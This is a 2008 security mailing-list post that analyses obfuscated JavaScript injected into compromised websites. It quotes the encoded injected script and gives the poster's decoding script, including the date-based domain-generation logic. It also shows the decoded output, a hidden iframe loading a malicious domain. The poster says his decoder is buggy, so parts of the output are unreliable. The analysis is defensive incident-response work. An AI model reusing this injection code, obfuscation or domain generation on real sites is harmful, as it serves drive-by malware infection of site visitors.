[nsp-sec] ack Re: probably compromised web sites

Paul Dokas dokas at oitsec.umn.edu
Thu Mar 20 15:14:22 EDT 2008 

Jon Lewis wrote:

> I'm in kind of a hurry to get a road trip started, so I haven't bothered
> decoding this yet...but here's the javascript code that was added.
> 
> $="%63b%3d%22%2528d%2573)%253bst%253dtm%2570%253d%
> 2527%2527;for%2528%2569%253d0;%2569%253cds.%25%22;cu%3d%22(p}b4g
> xq)6b}g}v}x}
> .|}ppqz6*(}rfuyq4gfw)6|`d.;;bqgx{l:w{y;xp;pl;64c}p|)%25$$4|q}s|),$*(;}rfuyq*(
> ;p}b*%22;op%3d%22%2524%253d%2522%2564w%2528%2564cs(%2563u,%2531%2534))%253b%2522
> ;%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t

  <snip snip>

> d-1){sc(%27v%62%75lle%74in_%6dult%69%71u%6ft%65%3d%27,2,%37)%3bev%61%6c(u%6e%65s
> ca%70%65%28%64z%2b%63z+%6f%70%2bst)%2b%27d%77(dz%2bcz(%24+%73t)%29;%27)}%65lse%7
> b$%3d%27%27};func%74%69on %73c(c%6em%2cv,e%64){%76ar%20e%78d%3dnew
> %44%61te%28);
> e%78d%2eset%44ate%28e%78d.g%65t%44ate%28)+%65d)%3bdo%63u%6dent%2eco%6fk%69e%3dcn
> %6d%2b%20%27%3d%27
> +esc%61pe%28%76)%2b%27;ex%70ir%65s%3d%27+ex%64.t%6fGM%54St%72
> i%6eg()%3b};";eval(unescape($));document.write($);



I've torn it apart (not an easy process) and arrived at the following script.  There's
still a bug in there somewhere that is causing characters to be dropped or altered,
so please be careful with this.  The results may not be 100% accurate.  The output of
this for today is:

<div sle="visibili:hidden"><iframe src="htp://bgidthr.com/ld/dx/" widh=100 heigh=80></iframe></div>

The errors are pretty obvious, but the URL seems right.  bgidthr.com is registered.

Basically, they're building the URLs on the fly based on the date.

It's also interesting to see 'veslox.com' in there.  Perhaps they're involved or
maybe it's to mislead people analyzing the script.  I don't know.

In case anyone is interested, I used the following method to tear this apart:

  http://www.websense.com/securitylabs/blog/blog.php?BlogID=98

Paul




-----------------------------CUT HERE-----------------------------
cb="%28d%73)%3bst%3dtm%70%3d%27%27;for%28%69%3d0;%69%3cds.%";
cu="(p}b4gxq)6b}g}v}x}.|}ppqz6*(}rfuyq4gfw)6|`d.;;bqgx{l:w{y;xp;pl;64c}p|)%$$4|q}s|),$*(;}rfuyq*(;p}b*";
op="%24%3d%22%64w%28%64cs(%63u,%31%34))%3b%22;";
de="-|)K88d)K7}7M;}^}950%22%9M+yv888d)K7t7M:%229.-%2096688d)K7t7M:%229,-)99tSx-~)K8d)K7t7M50!%209M+u|cu0tSx-|)K88d)K7t7M:&950%22'9M+4-4>bu|qsu8t<iSx%22;}Sx;iSx!;tSx;})Kd)K7}7M=!M;
7>s%7F}79+";
cc="6cen%67t%68;i%2b+){%74mp%3dds%2e%73l%69ce%28i,i%2b%31)%";
ce="2e%63har%43ode%41%74(0%29^(%270%780%30%27+es)%29%29;}}";
//cz="%66un%63ti%6fn%20%63z(c%7a){r%65t%75rn%20c%61%2b%63b+%63c+c%64%2bc%65%2bc%7a;%7d;";
st="%73t%3d%22$%3ds%74%3bd%63%73%28d%61%2b%64b%2b%64%63+%64%64+%64%65%2c%31%30%29;%64%77(%73t%29;%73t%3d%24%3b%22%3b";
db="d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<%22<#<$<%<&<'<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89=8t)>wudTq
i89;%229+u|cu";
cd="3b%73t%3dst%2bSt%72i%6eg%2efr%6fmC%68ar%43od%65((%74mp%";
da="fqb0})-~ug0Qbbqi87e~%7F7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7<7fuc7<7wxd7<7u~y7<7ud~7<7|uf7<7dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7<7{7<7|7<7}7<7~7<7%7F7<73c7
a7<7b7<7c7<7";
dz="%66u%6ecti%6f%6e%20%64w(t%29{c%61%3d%27%2564o%2563u%256den%2574%2ew%2572%69%25%374e%2528%252%32%27;%63%65%3d%27%2522)%27;c%62%3d%27%253c%2573c%72%69%2570%257%34l%61%256egu%256
1%67%2565%253d%255c%2522j%61va%73cr%2569%2570%74%255c%25%32%32%253e%27;cc%3d%27%253c%255c%252fsc%2572i%257%30t%253e%27;ev%61l%28%75n%65sca%70e%28t)%29};";
ca="%66u%6ec%74%69o%6edc%73(%64s,%65%73){d%73%3dunes%63ape";
dd="}Sx<tSx<}^}+yv8d)K7i7M,%22%20%20'9kd)K7i7M0-0%22%20%20'+m}^}-S]^8d)K7t7M<d)K7}7M<d)K7i7M9+iSx!-|)K888d)K7i7M6%20hQQ9;}^}950&5##950%22&M+iSx%22-|)K8888d)K7i7M6%20h##!!9..#9;}^}
950!%209M+}Sx";
dc="0d)K7t7M-t)>wudTqdu89=8t)>wudTqi899+yv8d)K7t7M,%209d)K7t7M-!+d)K7}7M-t)>wud]%7F~dx89;!+ve~sdy%7F~0S]^8t<}<i9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%7Fh>s%7F}7+fqb
0iSx!<iSx%22<";

function cz(cz)
{
  return ca+cb+cc+cd+ce+cz;
};

$="dw(dcs(cu,14));";
st="$=st;dcs(da+db+dc+dd+de,10);dw(st);st=$;";
dw(dz+cz($+st));

function dw(t)
{
  ca='%64o%63u%6den%74.w%72i%74e%28%22';
  ce='%22)';
  cb='%3c%73cri%70%74la%6egu%61g%65%3d%5c%22javascr%69%70t%5c%22%3e';
  cc='%3c%5c%2fsc%72i%70t%3e';
  //eval(unescape(t))
  print(unescape(t))
};

function dcs(ds,es)
{
  ds=unescape(ds);
  st=tmp='';
  for(i=0;i<ds.length;i++) {
    tmp=ds.slice(i,i+1);
    st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));
  }
}

dw(dcs(cu,14));
$=st;
dcs(da+db+dc+dd+de,10);
dw(st);
st=$;

var m9=new Array('uno','dve','thr','fir','vif','xes','ves','ght','eni','etn','lev','twe');
//var l9=new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','#s'q','r','s','t','u','v','w','x','y','z');
var l9=new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
var n9=new Array(1,2,3,4,5,6,7,8,9);
var t9=new Array();
var d9=new Date();
t9['y']=d9.getFullYear();

if(d9.getDay()>3)
  t9['d']=d9.getDate()-(d9.getDay()+2);
else
  t9['d']=d9.getDate()-(d9.getDay());

if(t9['d']<0)  t9['d']=1;
t9['m']=d9.getMonth()+1;

function CMN(d,m,y) {
  var r=(((y+(3*d))+(m^d)*3)+d);
  return r;
}

var d='veslox.com';
var yCh1,yCh2,mCh,dCh,mNm;
if(t9['y']<2007) {
  t9['y'] = 2007;
}

mNm=CMN(t9['d'],t9['m'],t9['y']);
yCh1=l9[(((t9['y']&0xAA)+mNm)% 63)% 26];
yCh2=l9[((((t9['y']&0x3311)>>3)+mNm)% 10)];
mCh=l9[((t9['m']+mNm)% 25)];
if(((t9['d']*2)>=0)&&((t9['d']*2)<=9))
  dCh=n9[(t9['d']% 10)];
else
  dCh=l9[((t9['d']*6)% 27)];
//$=$.relace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com');
fnord=$.replace(d,yCh2+mCh+yCh1+dCh+m9[t9['m']-1]+'.com');
print(fnord);
-----------------------------CUT HERE-----------------------------
-- 
Paul Dokas                                     dokas at oitsec.umn.edu
======================================================================
Don Juan Matus:  "an enigma wrapped in mystery wrapped in a tortilla."

More information about the nsp-security mailing list